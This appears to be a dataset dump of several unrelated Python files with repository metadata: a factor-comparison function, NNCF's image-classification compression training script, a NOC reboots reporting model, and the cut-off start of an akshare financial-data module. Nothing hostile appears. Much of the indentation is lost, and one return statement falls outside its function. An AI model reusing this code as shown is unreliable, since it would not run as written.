| no_license | https://github.com/1068171/CSE-Novello-Final | 08c3ee43d4015204a7a4e93b692d2fcb47ef2a7d | 7c8c568ec9aefacaeb712aee64fb60102d528fc5 | refs/heads/master | 2016-09-14T18:53:15.432698 | 2016-05-25T00:06:21 | 2016-05-25T00:06:21 | 59,050,028 | 0 | 10 | null | false | 2016-05-24T16:42:05 | 2016-05-17T18:52:15 | 2016-05-19T20:13:45 | 2016-05-24T16:42:05 | 29 | 0 | 9 | 1 | Python | null | null | def compare_factors(list1, list2):
    # Each argument is a list of (factor, count) pairs describing a factorization.
    # The result is the number of factors (counted with multiplicity) shared by both
    # lists divided by the total number of factors in the two lists combined, e.g.
    # compare_factors([(2, 3), (3, 1)], [(2, 1), (5, 2)]) -> 1/7, rounded to 0.14.
    length_1 = len(list1)
    length_2 = len(list2)
    list_1_factors = []
    list_2_factors = []
    for x in range(length_1): # Puts the first number of each pair in list1 in a list
        list_1_factors.append(list1[x][0])
    for x in range(length_2): # Puts the first number of each pair in list2 in a list
        list_2_factors.append(list2[x][0])
    overlap = [] # For each factor of list2, the index of the matching factor in list1
    final_value = 0 # Number of common factors, counted with multiplicity
    for x in range(len(list_2_factors)):
        flag = False # Stays false when list1 has no matching factor
        for y in range(len(list_1_factors)):
            if list_2_factors[x] == list_1_factors[y]: # Compares factors
                overlap.append(y)
                flag = True
                break
        if flag == False:
            overlap.append("no") # Can't use 'False' or '0' because they are valid indices
    for index in range(len(overlap)): # Adds the smaller count of every shared factor
        if overlap[index] != "no":
            if list2[index][1] < list1[overlap[index]][1]:
                final_value += list2[index][1]
            else:
                final_value += list1[overlap[index]][1]
    total_nums = 0
    for pair in list1: # Finds the total number of factors
        total_nums += pair[1]
    for pair in list2:
        total_nums += pair[1]
    output = float(final_value)/float(total_nums) # Fraction of all factors that are common
    output = round(output, 2)
return output | UTF-8 | Python | false | false | 2,302 | py | 5 | Compare_Factors_Final.py | 4 | 0.620765 | 0.598175 | 0 | 61 | 36.754098 | 121 |
openvinotoolkit/nncf | 455,266,542,980 | b228e6de6f116ff601e35b2f332a21a20ba1765e | 62179a165ec620ba967dbc20016e890978fbff50 | /examples/torch/classification/main.py | 2854c894f0a8a93f854d8900b264aa0339c1ade8 | [
"Apache-2.0"
]
| permissive | https://github.com/openvinotoolkit/nncf | 91fcf153a96f85da166aacb7a70ca4941e4ba4a4 | c027c8b43c4865d46b8de01d8350dd338ec5a874 | refs/heads/develop | 2023-08-24T11:25:05.704499 | 2023-08-23T14:44:05 | 2023-08-23T14:44:05 | 263,687,600 | 558 | 157 | Apache-2.0 | false | 2023-09-14T17:06:41 | 2020-05-13T16:41:05 | 2023-09-14T12:38:03 | 2023-09-14T17:06:41 | 39,847 | 659 | 176 | 65 | Python | false | false | # Copyright (c) 2023 Intel Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path as osp
import sys
import time
import warnings
from copy import deepcopy
from functools import partial
from pathlib import Path
from shutil import copyfile
from typing import Any
import torch
import torch.nn.parallel
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
from torch import nn
from torch.backends import cudnn
from torch.cuda.amp.autocast_mode import autocast
from torch.nn.modules.loss import _Loss
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torchvision import datasets
from torchvision import models
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torchvision.datasets import CIFAR100
from torchvision.models import InceptionOutputs
from examples.common.paths import configure_paths
from examples.common.sample_config import SampleConfig
from examples.common.sample_config import create_sample_config
from examples.torch.common.argparser import get_common_argument_parser
from examples.torch.common.argparser import parse_args
from examples.torch.common.example_logger import logger
from examples.torch.common.execution import ExecutionMode
from examples.torch.common.execution import get_execution_mode
from examples.torch.common.execution import prepare_model_for_execution
from examples.torch.common.execution import set_seed
from examples.torch.common.execution import start_worker
from examples.torch.common.export import export_model
from examples.torch.common.model_loader import COMPRESSION_STATE_ATTR
from examples.torch.common.model_loader import MODEL_STATE_ATTR
from examples.torch.common.model_loader import extract_model_and_compression_states
from examples.torch.common.model_loader import load_model
from examples.torch.common.model_loader import load_resuming_checkpoint
from examples.torch.common.optimizer import get_parameter_groups
from examples.torch.common.optimizer import make_optimizer
from examples.torch.common.utils import MockDataset
from examples.torch.common.utils import NullContextManager
from examples.torch.common.utils import SafeMLFLow
from examples.torch.common.utils import configure_device
from examples.torch.common.utils import configure_logging
from examples.torch.common.utils import create_code_snapshot
from examples.torch.common.utils import get_run_name
from examples.torch.common.utils import is_pretrained_model_requested
from examples.torch.common.utils import is_staged_quantization
from examples.torch.common.utils import log_common_mlflow_params
from examples.torch.common.utils import make_additional_checkpoints
from examples.torch.common.utils import print_args
from examples.torch.common.utils import write_metrics
from nncf.api.compression import CompressionStage
from nncf.common.accuracy_aware_training import create_accuracy_aware_training_loop
from nncf.common.utils.tensorboard import prepare_for_tensorboard
from nncf.config.utils import is_accuracy_aware_training
from nncf.torch import create_compressed_model
from nncf.torch.checkpoint_loading import load_state
from nncf.torch.dynamic_graph.graph_tracer import create_input_infos
from nncf.torch.initialization import default_criterion_fn
from nncf.torch.initialization import register_default_init_args
from nncf.torch.structures import ExecutionParameters
from nncf.torch.utils import is_main_process
from nncf.torch.utils import safe_thread_call
model_names = sorted(
name for name, val in models.__dict__.items() if name.islower() and not name.startswith("__") and callable(val)
)
def get_argument_parser():
parser = get_common_argument_parser()
parser.add_argument("--dataset", help="Dataset to use.", choices=["imagenet", "cifar100", "cifar10"], default=None)
parser.add_argument(
"--test-every-n-epochs", default=1, type=int, help="Enables running validation every given number of epochs"
)
parser.add_argument(
"--mixed-precision",
dest="mixed_precision",
help="Enables torch.cuda.amp autocasting during training and validation steps",
action="store_true",
)
return parser
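# Example of the extra flags defined above, combined with the common sample arguments
# (the common parser is assumed to supply --config, --data, --log-dir and the run mode):
#   python main.py ... --dataset cifar100 --test-every-n-epochs 5 --mixed-precision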
def main(argv):
parser = get_argument_parser()
args = parse_args(parser, argv)
config = create_sample_config(args, parser)
if config.dist_url == "env://":
config.update_from_env()
configure_paths(config, get_run_name(config))
copyfile(args.config, osp.join(config.log_dir, "config.json"))
source_root = Path(__file__).absolute().parents[2] # nncf root
create_code_snapshot(source_root, osp.join(config.log_dir, "snapshot.tar.gz"))
if config.seed is not None:
warnings.warn(
"You have chosen to seed training. "
"This will turn on the CUDNN deterministic setting, "
"which can slow down your training considerably! "
"You may see unexpected behavior when restarting "
"from checkpoints."
)
config.execution_mode = get_execution_mode(config)
if config.metrics_dump is not None:
write_metrics(0, config.metrics_dump)
if not is_staged_quantization(config):
start_worker(main_worker, config)
else:
from examples.torch.classification.staged_quantization_worker import (
staged_quantization_main_worker, # pylint: disable=cyclic-import
)
start_worker(staged_quantization_main_worker, config)
def inception_criterion_fn(model_outputs: Any, target: Any, criterion: _Loss) -> torch.Tensor:
# From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958
output, aux_outputs = model_outputs
loss1 = criterion(output, target)
loss2 = criterion(aux_outputs, target)
return loss1 + 0.4 * loss2
# pylint:disable=too-many-branches,too-many-statements
def main_worker(current_gpu, config: SampleConfig):
configure_device(current_gpu, config)
config.mlflow = SafeMLFLow(config)
if is_main_process():
configure_logging(logger, config)
print_args(config)
else:
config.tb = None
set_seed(config)
# define loss function (criterion)
criterion = nn.CrossEntropyLoss()
criterion = criterion.to(config.device)
model_name = config["model"]
train_criterion_fn = inception_criterion_fn if "inception" in model_name else default_criterion_fn
train_loader = train_sampler = val_loader = None
resuming_checkpoint_path = config.resuming_checkpoint_path
nncf_config = config.nncf_config
pretrained = is_pretrained_model_requested(config)
is_export_only = "export" in config.mode and ("train" not in config.mode and "test" not in config.mode)
if is_export_only:
assert pretrained or (resuming_checkpoint_path is not None)
else:
# Data loading code
train_dataset, val_dataset = create_datasets(config)
train_loader, train_sampler, val_loader, init_loader = create_data_loaders(config, train_dataset, val_dataset)
def train_steps_fn(loader, model, optimizer, compression_ctrl, train_steps):
train_epoch(
loader,
model,
criterion,
train_criterion_fn,
optimizer,
compression_ctrl,
0,
config,
train_iters=train_steps,
log_training_info=False,
)
def validate_model_fn(model, eval_loader):
top1, top5, loss = validate(eval_loader, model, criterion, config, log_validation_info=False)
return top1, top5, loss
def model_eval_fn(model):
top1, _, _ = validate(val_loader, model, criterion, config)
return top1
execution_params = ExecutionParameters(config.cpu_only, config.current_gpu)
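        # validate_model_fn returns (top1, top5, loss): the [::2] slice below feeds
        # (top1, loss) to validate_fn, while index [1] feeds top5 to autoq_eval_fn.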
nncf_config = register_default_init_args(
nncf_config,
init_loader,
criterion=criterion,
criterion_fn=train_criterion_fn,
train_steps_fn=train_steps_fn,
validate_fn=lambda *x: validate_model_fn(*x)[::2],
autoq_eval_fn=lambda *x: validate_model_fn(*x)[1],
val_loader=val_loader,
model_eval_fn=model_eval_fn,
device=config.device,
execution_parameters=execution_params,
)
# create model
model = load_model(
model_name,
pretrained=pretrained,
num_classes=config.get("num_classes", 1000),
model_params=config.get("model_params"),
weights_path=config.get("weights"),
)
model.to(config.device)
if "train" in config.mode and is_accuracy_aware_training(config):
uncompressed_model_accuracy = model_eval_fn(model)
resuming_checkpoint = None
if resuming_checkpoint_path is not None:
resuming_checkpoint = load_resuming_checkpoint(resuming_checkpoint_path)
model_state_dict, compression_state = extract_model_and_compression_states(resuming_checkpoint)
compression_ctrl, model = create_compressed_model(model, nncf_config, compression_state)
if model_state_dict is not None:
load_state(model, model_state_dict, is_resume=True)
if is_export_only:
export_model(compression_ctrl, config.to_onnx, config.no_strip_on_export)
logger.info(f"Saved to {config.to_onnx}")
return
model, _ = prepare_model_for_execution(model, config)
if config.distributed:
compression_ctrl.distributed()
# define optimizer
params_to_optimize = get_parameter_groups(model, config)
optimizer, lr_scheduler = make_optimizer(params_to_optimize, config)
best_acc1 = 0
# optionally resume from a checkpoint
if resuming_checkpoint_path is not None:
if "train" in config.mode:
config.start_epoch = resuming_checkpoint["epoch"]
best_acc1 = resuming_checkpoint["best_acc1"]
optimizer.load_state_dict(resuming_checkpoint["optimizer"])
logger.info(
"=> loaded checkpoint '{}' (epoch: {}, best_acc1: {:.3f})".format(
resuming_checkpoint_path, resuming_checkpoint["epoch"], best_acc1
)
)
else:
logger.info("=> loaded checkpoint '{}'".format(resuming_checkpoint_path))
log_common_mlflow_params(config)
if config.execution_mode != ExecutionMode.CPU_ONLY:
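        # let cuDNN benchmark and pick the fastest convolution algorithms for the fixed input size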
cudnn.benchmark = True
if is_main_process():
statistics = compression_ctrl.statistics()
logger.info(statistics.to_str())
if "train" in config.mode:
if is_accuracy_aware_training(config):
# validation function that returns the target metric value
# pylint: disable=E1123
def validate_fn(model, epoch):
top1, _, _ = validate(val_loader, model, criterion, config, epoch=epoch)
return top1
# training function that trains the model for one epoch (full training dataset pass)
# it is assumed that all the NNCF-related methods are properly called inside of
# this function (like e.g. the step and epoch_step methods of the compression scheduler)
def train_epoch_fn(compression_ctrl, model, epoch, optimizer, **kwargs):
return train_epoch(
train_loader, model, criterion, train_criterion_fn, optimizer, compression_ctrl, epoch, config
)
# function that initializes optimizers & lr schedulers to start training
def configure_optimizers_fn():
params_to_optimize = get_parameter_groups(model, config)
optimizer, lr_scheduler = make_optimizer(params_to_optimize, config)
return optimizer, lr_scheduler
acc_aware_training_loop = create_accuracy_aware_training_loop(
nncf_config, compression_ctrl, uncompressed_model_accuracy
)
model = acc_aware_training_loop.run(
model,
train_epoch_fn=train_epoch_fn,
validate_fn=validate_fn,
configure_optimizers_fn=configure_optimizers_fn,
tensorboard_writer=config.tb,
log_dir=config.log_dir,
)
logger.info(f"Compressed model statistics:\n{acc_aware_training_loop.statistics.to_str()}")
else:
train(
config,
compression_ctrl,
model,
criterion,
train_criterion_fn,
lr_scheduler,
model_name,
optimizer,
train_loader,
train_sampler,
val_loader,
best_acc1,
)
if "test" in config.mode:
val_model = model
validate(val_loader, val_model, criterion, config)
config.mlflow.end_run()
if "export" in config.mode:
export_model(compression_ctrl, config.to_onnx, config.no_strip_on_export)
logger.info(f"Saved to {config.to_onnx}")
def train(
config,
compression_ctrl,
model,
criterion,
criterion_fn,
lr_scheduler,
model_name,
optimizer,
train_loader,
train_sampler,
val_loader,
best_acc1=0,
):
best_compression_stage = CompressionStage.UNCOMPRESSED
for epoch in range(config.start_epoch, config.epochs):
# update compression scheduler state at the begin of the epoch
compression_ctrl.scheduler.epoch_step()
if config.distributed:
train_sampler.set_epoch(epoch)
# train for one epoch
train_epoch(train_loader, model, criterion, criterion_fn, optimizer, compression_ctrl, epoch, config)
# Learning rate scheduling should be applied after optimizer’s update
lr_scheduler.step(epoch if not isinstance(lr_scheduler, ReduceLROnPlateau) else best_acc1)
# compute compression algo statistics
statistics = compression_ctrl.statistics()
acc1 = best_acc1
if epoch % config.test_every_n_epochs == 0:
# evaluate on validation set
acc1, _, _ = validate(val_loader, model, criterion, config, epoch=epoch)
compression_stage = compression_ctrl.compression_stage()
        # remember best acc@1, considering the compression stage. If the current acc@1 is less than the best acc@1,
        # the checkpoint can still be the best one if its compression stage is higher than the best stage so far.
        # Compression stages in ascending order: UNCOMPRESSED, PARTIALLY_COMPRESSED, FULLY_COMPRESSED.
is_best_by_accuracy = acc1 > best_acc1 and compression_stage == best_compression_stage
is_best = is_best_by_accuracy or compression_stage > best_compression_stage
if is_best:
best_acc1 = acc1
config.mlflow.safe_call("log_metric", "best_acc1", best_acc1)
best_compression_stage = max(compression_stage, best_compression_stage)
acc = best_acc1 / 100
if config.metrics_dump is not None:
write_metrics(acc, config.metrics_dump)
if is_main_process():
logger.info(statistics.to_str())
checkpoint_path = osp.join(config.checkpoint_save_dir, get_run_name(config) + "_last.pth")
checkpoint = {
"epoch": epoch + 1,
"arch": model_name,
MODEL_STATE_ATTR: model.state_dict(),
COMPRESSION_STATE_ATTR: compression_ctrl.get_compression_state(),
"best_acc1": best_acc1,
"acc1": acc1,
"optimizer": optimizer.state_dict(),
}
torch.save(checkpoint, checkpoint_path)
make_additional_checkpoints(checkpoint_path, is_best, epoch + 1, config)
for key, value in prepare_for_tensorboard(statistics).items():
config.mlflow.safe_call("log_metric", "compression/statistics/{0}".format(key), value, epoch)
config.tb.add_scalar("compression/statistics/{0}".format(key), value, len(train_loader) * epoch)
def get_dataset(dataset_config, config, transform, is_train):
if dataset_config == "imagenet":
prefix = "train" if is_train else "val"
return datasets.ImageFolder(osp.join(config.dataset_dir, prefix), transform)
# For testing purposes
num_images = config.get("num_mock_images", 1000)
if dataset_config == "mock_32x32":
return MockDataset(img_size=(32, 32), transform=transform, num_images=num_images)
if dataset_config == "mock_299x299":
return MockDataset(img_size=(299, 299), transform=transform, num_images=num_images)
return create_cifar(config, dataset_config, is_train, transform)
def create_cifar(config, dataset_config, is_train, transform):
create_cifar_fn = None
if dataset_config in ["cifar100", "cifar100_224x224"]:
create_cifar_fn = partial(CIFAR100, config.dataset_dir, train=is_train, transform=transform)
if dataset_config == "cifar10":
create_cifar_fn = partial(CIFAR10, config.dataset_dir, train=is_train, transform=transform)
if create_cifar_fn:
return safe_thread_call(partial(create_cifar_fn, download=True), partial(create_cifar_fn, download=False))
return None
def create_datasets(config):
dataset_config = config.dataset if config.dataset is not None else "imagenet"
dataset_config = dataset_config.lower()
assert dataset_config in [
"imagenet",
"cifar100",
"cifar10",
"cifar100_224x224",
"mock_32x32",
"mock_299x299",
], "Unknown dataset option"
if dataset_config == "imagenet":
normalize = transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))
elif dataset_config in ["cifar100", "cifar100_224x224"]:
normalize = transforms.Normalize(mean=(0.5071, 0.4865, 0.4409), std=(0.2673, 0.2564, 0.2761))
elif dataset_config == "cifar10":
normalize = transforms.Normalize(mean=(0.4914, 0.4822, 0.4465), std=(0.2471, 0.2435, 0.2616))
elif dataset_config in ["mock_32x32", "mock_299x299"]:
normalize = transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))
input_info_list = create_input_infos(config)
image_size = input_info_list[0].shape[-1]
size = int(image_size / 0.875)
if dataset_config in ["cifar10", "cifar100_224x224", "cifar100"]:
list_val_transforms = [transforms.ToTensor(), normalize]
if dataset_config == "cifar100_224x224":
list_val_transforms.insert(0, transforms.Resize(image_size))
val_transform = transforms.Compose(list_val_transforms)
list_train_transforms = [
transforms.RandomCrop(image_size, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]
if dataset_config == "cifar100_224x224":
list_train_transforms.insert(0, transforms.Resize(image_size))
train_transforms = transforms.Compose(list_train_transforms)
elif dataset_config in ["mock_32x32", "mock_299x299"]:
val_transform = transforms.Compose(
[
transforms.Resize(size),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
]
)
train_transforms = transforms.Compose(
[
transforms.Resize(size),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
]
)
else:
val_transform = transforms.Compose(
[
transforms.Resize(size),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
]
)
train_transforms = transforms.Compose(
[
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]
)
val_dataset = get_dataset(dataset_config, config, val_transform, is_train=False)
train_dataset = get_dataset(dataset_config, config, train_transforms, is_train=True)
return train_dataset, val_dataset
def create_data_loaders(config, train_dataset, val_dataset):
pin_memory = config.execution_mode != ExecutionMode.CPU_ONLY
# When using a single GPU per process and per
# DistributedDataParallel, we need to divide the batch size
# ourselves based on the total number of GPUs we have
batch_size = int(config.batch_size)
workers = int(config.workers)
batch_size_val = int(config.batch_size_val) if config.batch_size_val is not None else int(config.batch_size)
if config.execution_mode == ExecutionMode.MULTIPROCESSING_DISTRIBUTED:
batch_size //= config.ngpus_per_node
batch_size_val //= config.ngpus_per_node
workers //= config.ngpus_per_node
val_sampler = torch.utils.data.SequentialSampler(val_dataset)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size_val,
shuffle=False,
num_workers=workers,
pin_memory=pin_memory,
sampler=val_sampler,
drop_last=False,
)
train_sampler = None
if config.distributed:
sampler_seed = 0 if config.seed is None else config.seed
dist_sampler_shuffle = config.seed is None
train_sampler = torch.utils.data.distributed.DistributedSampler(
train_dataset, seed=sampler_seed, shuffle=dist_sampler_shuffle
)
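    # shuffle in the DataLoader only when neither a distributed sampler nor a fixed seed is used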
train_shuffle = train_sampler is None and config.seed is None
def create_train_data_loader(batch_size_):
return torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size_,
shuffle=train_shuffle,
num_workers=workers,
pin_memory=pin_memory,
sampler=train_sampler,
drop_last=True,
)
train_loader = create_train_data_loader(batch_size)
if config.batch_size_init:
init_loader = create_train_data_loader(config.batch_size_init)
else:
init_loader = deepcopy(train_loader)
return train_loader, train_sampler, val_loader, init_loader
def train_epoch(
train_loader,
model,
criterion,
criterion_fn,
optimizer,
compression_ctrl,
epoch,
config,
train_iters=None,
log_training_info=True,
):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
compression_losses = AverageMeter()
criterion_losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
if train_iters is None:
train_iters = len(train_loader)
compression_scheduler = compression_ctrl.scheduler
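    # use AMP autocast when mixed precision is enabled, otherwise a no-op context manager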
casting = autocast if config.mixed_precision else NullContextManager
# switch to train mode
model.train()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
compression_scheduler.step()
input_ = input_.to(config.device)
target = target.to(config.device)
# compute output
with casting():
output = model(input_)
criterion_loss = criterion_fn(output, target, criterion)
# compute compression loss
compression_loss = compression_ctrl.loss()
loss = criterion_loss + compression_loss
if isinstance(output, InceptionOutputs):
output = output.logits
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input_.size(0))
comp_loss_val = compression_loss.item() if isinstance(compression_loss, torch.Tensor) else compression_loss
compression_losses.update(comp_loss_val, input_.size(0))
criterion_losses.update(criterion_loss.item(), input_.size(0))
top1.update(acc1, input_.size(0))
top5.update(acc5, input_.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % config.print_freq == 0 and log_training_info:
logger.info(
"{rank}: "
"Epoch: [{0}][{1}/{2}] "
"Lr: {3:.3} "
"Time: {batch_time.val:.3f} ({batch_time.avg:.3f}) "
"Data: {data_time.val:.3f} ({data_time.avg:.3f}) "
"CE_loss: {ce_loss.val:.4f} ({ce_loss.avg:.4f}) "
"CR_loss: {cr_loss.val:.4f} ({cr_loss.avg:.4f}) "
"Loss: {loss.val:.4f} ({loss.avg:.4f}) "
"Acc@1: {top1.val:.3f} ({top1.avg:.3f}) "
"Acc@5: {top5.val:.3f} ({top5.avg:.3f})".format(
epoch,
i,
len(train_loader),
get_lr(optimizer),
batch_time=batch_time,
data_time=data_time,
ce_loss=criterion_losses,
cr_loss=compression_losses,
loss=losses,
top1=top1,
top5=top5,
rank="{}:".format(config.rank) if config.multiprocessing_distributed else "",
)
)
if is_main_process() and log_training_info:
global_step = train_iters * epoch
config.tb.add_scalar("train/learning_rate", get_lr(optimizer), i + global_step)
config.tb.add_scalar("train/criterion_loss", criterion_losses.val, i + global_step)
config.tb.add_scalar("train/compression_loss", compression_losses.val, i + global_step)
config.tb.add_scalar("train/loss", losses.val, i + global_step)
config.tb.add_scalar("train/top1", top1.val, i + global_step)
config.tb.add_scalar("train/top5", top5.val, i + global_step)
statistics = compression_ctrl.statistics(quickly_collected_only=True)
for stat_name, stat_value in prepare_for_tensorboard(statistics).items():
config.tb.add_scalar("train/statistics/{}".format(stat_name), stat_value, i + global_step)
if i >= train_iters:
break
def validate(val_loader, model, criterion, config, epoch=0, log_validation_info=True):
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
casting = autocast if config.mixed_precision else NullContextManager
with torch.no_grad():
end = time.time()
for i, (input_, target) in enumerate(val_loader):
input_ = input_.to(config.device)
target = target.to(config.device)
# compute output
with casting():
output = model(input_)
loss = default_criterion_fn(output, target, criterion)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input_.size(0))
top1.update(acc1, input_.size(0))
top5.update(acc5, input_.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % config.print_freq == 0 and log_validation_info:
logger.info(
"{rank}"
"Test: [{0}/{1}] "
"Time: {batch_time.val:.3f} ({batch_time.avg:.3f}) "
"Loss: {loss.val:.4f} ({loss.avg:.4f}) "
"Acc@1: {top1.val:.3f} ({top1.avg:.3f}) "
"Acc@5: {top5.val:.3f} ({top5.avg:.3f})".format(
i,
len(val_loader),
batch_time=batch_time,
loss=losses,
top1=top1,
top5=top5,
rank="{}:".format(config.rank) if config.multiprocessing_distributed else "",
)
)
if is_main_process() and log_validation_info:
config.tb.add_scalar("val/loss", losses.avg, len(val_loader) * epoch)
config.tb.add_scalar("val/top1", top1.avg, len(val_loader) * epoch)
config.tb.add_scalar("val/top5", top5.avg, len(val_loader) * epoch)
config.mlflow.safe_call("log_metric", "val/loss", float(losses.avg), epoch)
config.mlflow.safe_call("log_metric", "val/top1", float(top1.avg), epoch)
config.mlflow.safe_call("log_metric", "val/top5", float(top5.avg), epoch)
if log_validation_info:
logger.info(" * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}\n".format(top1=top1, top5=top5))
acc = top1.avg / 100
if config.metrics_dump is not None:
write_metrics(acc, config.metrics_dump)
return top1.avg, top5.avg, losses.avg
class AverageMeter:
"""Computes and stores the average and current value"""
def __init__(self):
self.val = None
self.avg = None
self.sum = None
self.count = None
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].reshape(-1).sum(0, keepdim=True)
res.append(correct_k.float().mul_(100.0 / batch_size).item())
return res
def get_lr(optimizer):
return optimizer.param_groups[0]["lr"]
if __name__ == "__main__":
main(sys.argv[1:])
| UTF-8 | Python | false | false | 30,918 | py | 1,665 | main.py | 873 | 0.630709 | 0.616121 | 0 | 793 | 37.986129 | 119 |
nocproject/noc | 11,063,835,788,638 | e81994eeab9846d29b19f3ff5ad1469a97ac2ea2 | 2337351b228818e41be3002bd38f68f77c2aa074 | /bi/models/reboots.py | 4478010291c1ef641e77583dd04377b38e0474ba | [
"BSD-3-Clause"
]
| permissive | https://github.com/nocproject/noc | 57d40c680a1499374463e472434f9595ed6d1374 | 6e6d71574e9b9d822bec572cc629a0ea73604a59 | refs/heads/master | 2023-08-31T01:11:33.544573 | 2023-08-30T17:31:11 | 2023-08-30T17:31:11 | 107,815,776 | 105 | 33 | BSD-3-Clause | false | 2023-07-31T07:57:45 | 2017-10-21T21:04:33 | 2023-07-18T16:58:03 | 2023-07-31T07:46:42 | 91,288 | 103 | 29 | 14 | Python | false | false | # ----------------------------------------------------------------------
# Reboots model
# ----------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from noc.core.clickhouse.model import Model
from noc.core.clickhouse.fields import (
DateField,
DateTimeField,
Float64Field,
ReferenceField,
IPv4Field,
)
from noc.core.clickhouse.engines import MergeTree
from noc.core.bi.dictionaries.managedobject import ManagedObject
from noc.core.bi.dictionaries.vendor import Vendor
from noc.core.bi.dictionaries.platform import Platform
from noc.core.bi.dictionaries.version import Version
from noc.core.bi.dictionaries.profile import Profile
from noc.core.bi.dictionaries.objectprofile import ObjectProfile
from noc.core.bi.dictionaries.administrativedomain import AdministrativeDomain
from noc.core.bi.dictionaries.networksegment import NetworkSegment
from noc.core.bi.dictionaries.container import Container
from noc.core.bi.dictionaries.pool import Pool
from noc.sa.models.useraccess import UserAccess
from noc.sa.models.administrativedomain import AdministrativeDomain as AdministrativeDomainM
from noc.core.translation import ugettext as _
class Reboots(Model):
class Meta:
db_table = "reboots"
engine = MergeTree("date", ("ts", "managed_object"), primary_keys=("ts", "managed_object"))
date = DateField(description=_("Date"))
ts = DateTimeField(description=_("Created"))
last = DateTimeField(description=_("Last register"))
managed_object = ReferenceField(ManagedObject, description=_("Object Name"))
pool = ReferenceField(Pool, description=_("Pool Name"))
ip = IPv4Field(description=_("IP Address"))
profile = ReferenceField(Profile, description=_("Profile"))
object_profile = ReferenceField(ObjectProfile, description=_("Object Profile"))
vendor = ReferenceField(Vendor, description=_("Vendor Name"))
platform = ReferenceField(Platform, description=_("Platform"))
version = ReferenceField(Version, description=_("Version"))
administrative_domain = ReferenceField(AdministrativeDomain, description=_("Admin. Domain"))
segment = ReferenceField(NetworkSegment, description=_("Network Segment"))
container = ReferenceField(Container, description=_("Container"))
# Coordinates
x = Float64Field(description=_("Longitude"))
y = Float64Field(description=_("Latitude"))
@classmethod
def transform_query(cls, query, user):
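        """Restrict the BI query to administrative domains the requesting user may access."""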
if not user or user.is_superuser:
return query # No restrictions
# Get user domains
domains = UserAccess.get_domains(user)
# Resolve domains against dict
domain_ids = [x.bi_id for x in AdministrativeDomainM.objects.filter(id__in=domains)]
filter = query.get("filter", {})
dl = len(domain_ids)
if not dl:
return None
elif dl == 1:
q = {"$eq": [{"$field": "administrative_domain"}, domain_ids[0]]}
else:
q = {"$in": [{"$field": "administrative_domain"}, domain_ids]}
if filter:
query["filter"] = {"$and": [query["filter"], q]}
else:
query["filter"] = q
return query
| UTF-8 | Python | false | false | 3,339 | py | 10,368 | reboots.py | 4,525 | 0.656484 | 0.651093 | 0 | 76 | 42.934211 | 99 |
lucther/akshare | 16,363,825,398,911 | 0589c0d67b0bb192647136ec65f32950eaf726c0 | 894d085e3c19d0eb052d7fceaa668ab326e7a64b | /akshare/stock_feature/stock_three_report_em.py | e1ec3569b3839753dd0e57578230303976862245 | [
"MIT"
]
| permissive | https://github.com/lucther/akshare | cf7cf750716d9c7f118f6bb72aed11c3bb690d2b | b4fbceaa7fcb9cc26936ddb448a212468b3a02ba | refs/heads/master | 2023-09-02T01:25:53.760317 | 2023-08-22T08:48:32 | 2023-08-22T08:48:32 | 249,578,209 | 0 | 0 | null | true | 2020-03-24T00:52:30 | 2020-03-24T00:52:30 | 2020-03-23T13:49:48 | 2020-03-23T12:37:01 | 258,348 | 0 | 0 | 0 | null | false | false | # -*- coding:utf-8 -*-
# !/usr/bin/env python
"""
Date: 2023/8/22 14:20
Desc: Eastmoney - stock - financial analysis
"""
from functools import lru_cache
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
@lru_cache()
def _stock_balance_sheet_by_report_ctype_em(symbol: str = "SH600519") -> str:
"""
    Eastmoney - stock - financial analysis - balance sheet - by reporting period - company type lookup
    https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh601878#zcfzb-0
    :param symbol: stock code with market identifier
    :type symbol: str
    :return: Eastmoney company type used by the financial-analysis endpoints
:rtype: str
"""
